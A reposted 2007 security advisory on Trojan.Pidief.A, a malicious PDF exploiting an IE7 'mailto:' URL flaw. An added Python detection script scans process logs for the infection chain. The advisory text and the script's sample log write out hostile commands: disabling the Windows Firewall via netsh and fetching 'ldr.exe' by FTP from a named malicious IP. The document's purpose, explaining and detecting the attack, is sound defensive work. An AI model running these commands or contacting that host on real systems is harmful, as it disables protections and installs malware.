NOW READ THIS
("Security Advisory")
Submitted by: Bill Hickey
NCVA List Master
NRT-0322 Attacks Exploiting Windows/IE7 URL-Handling Vulnerability Are Growing:
On 23OCT, Symantec warned that a Trojan-horse PDF campaign is exploiting a
URL-handling vulnerability in Windows XP and Windows Server 2003 systems that have
Internet Explorer 7 installed. The activity is related to a vulnerability
discussed in a 10 October Microsoft Security Advisory (943521). At that time
Microsoft said that a patch was in development.
The vulnerability is caused by insufficient validation of URLs. Attackers can
leverage the flaw to execute arbitrary commands via maliciously created URLs.
Symantec noted in its advisory that the issue was originally disclosed in July
but initially received little attention. In light of new research, ongoing
exploitation activity, and Microsoft's advisory, Symantec now considers the problem
more severe. Symantec calls the malware Trojan.Pidief.A. The malicious PDF abuses
the "mailto:" URL-handling flaw to run embedded code that fetches a second file,
which Symantec detects as "Downloader." The PDF arrives as a spam e-mail attachment
with a file name such as "BILL.pdf" or "INVOICE.pdf."
Upon execution, the malicious code attempts to disable the Windows Firewall with a
"netsh firewall set opmode mode=disable" command, and then downloads a remote file
via FTP from 81.95.146.130. Symantec says the remote file "ldr.exe" is a downloader
Trojan. As of the afternoon of 23OCT, when Symantec posted its advisory, the host
81.95.146.130 was still serving "ldr.exe" over FTP. "This server is known for hosting
malicious software," Symantec warned.
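The behaviour chain above (PDF reader launching a shell, "netsh firewall set opmode mode=disable", then an FTP pull from 81.95.146.130 and execution of "ldr.exe") is concrete enough to detect from process-creation telemetry. The following is an added example written for this page, not code from Symantec, Microsoft or the original advisory. It assumes Windows process-creation events have already been exported as CSV lines with the fields timestamp, host, parent_image, image and command_line (a hypothetical export format), and it assumes the PDF is opened in Adobe Reader/Acrobat, which the advisory does not state; the sample log lines are constructed for illustration.

```python
"""Detection sketch for the Trojan.Pidief.A behaviour chain (added example).

Assumes a hypothetical CSV export of Windows process-creation events with the
columns: timestamp,host,parent_image,image,command_line.
"""
import csv
import io
import re
from dataclasses import dataclass

# Indicators taken from the advisory text.
KNOWN_BAD_HOST = "81.95.146.130"
KNOWN_BAD_FILE = "ldr.exe"

# Assumption: the malicious PDF is opened in Adobe Reader/Acrobat. The advisory
# does not name a reader; adjust to the PDF viewers deployed in your environment.
PDF_READERS = {"acrord32.exe", "acrobat.exe"}
SHELLS = {"cmd.exe", "netsh.exe", "ftp.exe"}

# "netsh firewall set opmode mode=disable", tolerant of spacing and case.
NETSH_DISABLE = re.compile(
    r"netsh(\.exe)?\s+firewall\s+set\s+opmode\s+(mode\s*=\s*)?disable", re.I
)


@dataclass
class Event:
    timestamp: str
    host: str
    parent_image: str
    image: str
    command_line: str

    @property
    def image_name(self) -> str:
        return self.image.rsplit("\\", 1)[-1].lower()

    @property
    def parent_name(self) -> str:
        return self.parent_image.rsplit("\\", 1)[-1].lower()


def parse_events(text: str) -> list:
    """Parse the hypothetical CSV export into Event records."""
    reader = csv.DictReader(io.StringIO(text))
    return [Event(**{k: v.strip() for k, v in row.items()}) for row in reader]


def classify(ev: Event) -> list:
    """Return the names of every detection that fires for one event."""
    hits = []
    cmd = ev.command_line
    if NETSH_DISABLE.search(cmd):
        hits.append("firewall_disabled_via_netsh")
    if ev.image_name == "ftp.exe" and KNOWN_BAD_HOST in cmd:
        hits.append("ftp_to_known_bad_host")
    if ev.image_name == KNOWN_BAD_FILE or KNOWN_BAD_FILE in cmd.lower():
        hits.append("ldr_exe_observed")
    if ev.parent_name in PDF_READERS and ev.image_name in SHELLS:
        hits.append("pdf_reader_spawned_shell")
    return hits


def scan(text: str) -> list:
    """Scan a log export; return (timestamp, host, detections) per hit event."""
    findings = []
    for ev in parse_events(text):
        hits = classify(ev)
        if hits:
            findings.append((ev.timestamp, ev.host, hits))
    return findings


# Constructed sample log lines (not real telemetry); paths are fictional.
SAMPLE_LOG = """timestamp,host,parent_image,image,command_line
2007-10-23T14:01:02,wkstn07,C:\\Program Files\\Adobe\\Reader 8.0\\Reader\\AcroRd32.exe,C:\\WINDOWS\\system32\\cmd.exe,cmd.exe /c netsh firewall set opmode mode=disable
2007-10-23T14:01:03,wkstn07,C:\\WINDOWS\\system32\\cmd.exe,C:\\WINDOWS\\system32\\ftp.exe,ftp.exe -s:C:\\DOCUME~1\\user\\LOCALS~1\\Temp\\x.txt 81.95.146.130
2007-10-23T14:05:44,wkstn12,C:\\WINDOWS\\explorer.exe,C:\\WINDOWS\\system32\\netsh.exe,netsh interface ip show config
2007-10-23T14:01:09,wkstn07,C:\\WINDOWS\\system32\\cmd.exe,C:\\DOCUME~1\\user\\LOCALS~1\\Temp\\ldr.exe,ldr.exe
"""

if __name__ == "__main__":
    for ts, host, hits in scan(SAMPLE_LOG):
        print(ts, host, ", ".join(hits))
```

The parent/child rule is the most durable of the four: the IP address and file name will change, but a PDF reader spawning cmd.exe, netsh.exe or ftp.exe is rarely legitimate and does not depend on knowing this campaign's indicators. The benign "netsh interface ip show config" line is included to show that the firewall rule keys on the opmode disable command rather than on netsh.exe itself.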
Until a patch is available, Symantec is advising that the delivery of PDF files in
email be blocked, or at a minimum that organizations tell employees not to read or
execute PDF files received from unknown or untrusted sources.
(www.eweek.com 23OCT07)